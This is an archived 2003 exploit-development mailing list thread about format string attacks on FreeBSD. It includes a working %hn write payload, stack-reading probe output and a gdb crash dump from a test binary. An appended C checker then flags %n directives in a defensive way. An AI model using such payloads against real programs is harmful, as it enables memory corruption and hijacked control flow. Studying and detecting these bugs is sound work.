Vulnerability Development mailing list archives

Re: Formatstrings on *BSD


From: "The Itch" <itchie () netric org>
Date: Sat, 21 Jun 2003 20:23:48 +0200

You can't use direct popping or writing (%number$x) on *BSD (well, only up to
8 pops/writes maximum).
I don't know why this behaviour is on BSD, but it is. On Linux you can have a
direct pop/write as far as you want.

(in your example you used %9$x)

--

The Itch
    -- http://www.netric.org

----- Original Message -----
From: "Ingram" <Vail () gmx net>
To: <vuln-dev () securityfocus com>
Sent: Friday, June 20, 2003 10:07 AM
Subject: Re: Formatstrings on *BSD


[%.-16457x%8$hn%.15261x%9$hn] (35)

^---- first question is your input still at %8$x and %9$x on the bsd box?

yep, see here:

uname
FreeBSD
./vuln AAAABBBB%x%x%x%x%x%x%x%x%x
0 0xbfbffccc
1 0xbfbffcd3
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffad8)
buffer =
[AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242]
(71)
after : ptrf() = 0x8048770 (0xbfbffad8)
Welcome in "helloWorld"


...
Segmentation fault (core dumped)

^---- second ... what does the bt look like in gdb...

here we go, the fmt seems to corrupt eax

gdb -core vuln.core
GNU gdb 4.18
.
.
.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `vuln'.
Program terminated with signal 11, Segmentation fault.
#0  0x40517d31 in ?? ()
(gdb) bt
#0  0x40517d31 in ?? ()
#1  0x8048805 in ?? ()
#2  0x8048767 in ?? ()
#3  0x8048561 in ?? ()
(gdb) i reg
eax            0x40517d31       1079082289
ecx            0x8049a70        134519408
edx            0x280e9968       672045416
ebx            0x280e8424       672039972
esp            0xbfbffad4       0xbfbffad4
ebp            0xbfbffae0       0xbfbffae0
esi            0x1      1
edi            0x280e9960       672045408
eip            0x40517d31       0x40517d31
eflags         0x10216  66070
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
(gdb) x/1x $eax
0x40517d31:     Cannot access memory at address 0x40517d31.


kind regards
Ingram

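As an added, defender-side example (not code from either poster): a small C checker that scans a string the way vfprintf would, reporting whether it contains read-only directives, a %n-family write, and the highest positional %N$ index (the %8$hn / %9$hn question in the thread). The helper name classify_format and the sample inputs are assumed/constructed; the actual fix for the bug under discussion is still to pass the untrusted string as an argument, printf("%s", buffer), never as the format.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Result of scanning a string that is about to become a printf FORMAT argument.
 * Hypothetical helper written for this page, not code from either poster. */
enum fmt_risk { FMT_NONE = 0, FMT_READ = 1, FMT_WRITE = 2 };

/* Walk the string the way vfprintf does: '%' opens a directive, "%%" is a
 * literal percent. Records the largest positional index (%N$) seen and returns
 * FMT_WRITE if any %n-family directive (%n, %hn, %ln ...) is present. */
enum fmt_risk classify_format(const char *s, int *max_pos)
{
    enum fmt_risk risk = FMT_NONE;
    const char *p;
    *max_pos = 0;
    for (p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;            /* "%%": escaped percent, harmless */
        if (*p == '\0') break;
        {   /* optional positional index: digits followed by '$' */
            const char *q = p; int n = 0;
            while (isdigit((unsigned char)*q)) n = n * 10 + (*q++ - '0');
            if (*q == '$') { if (n > *max_pos) *max_pos = n; p = q + 1; }
        }
        while (*p && strchr("-+ #0", *p)) p++;                        /* flags */
        while (*p && (isdigit((unsigned char)*p) || *p == '*')) p++;  /* width */
        if (*p == '.') {                                              /* precision */
            p++;
            while (*p && (isdigit((unsigned char)*p) || *p == '*' || *p == '-')) p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;                      /* length */
        if (*p == '\0') break;
        if (*p == 'n') risk = FMT_WRITE;   /* %n: the write primitive */
        else if (risk < FMT_READ) risk = FMT_READ;
    }
    return risk;
}

int main(void)
{
    /* constructed input: the payload quoted in the thread, handled as DATA */
    const char *payload = "[%.-16457x%8$hn%.15261x%9$hn]";
    int pos;
    enum fmt_risk r = classify_format(payload, &pos);
    printf("risk=%d max_positional=%d\n", r, pos);  /* prints risk=2 max_positional=9 */
    printf("%s\n", payload);  /* hardened form: the untrusted string is an argument */
    return 0;
}
```

Such a check is only defence in depth (for log scanners or a fuzz harness); it does not replace fixing the printf(buffer) call itself.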
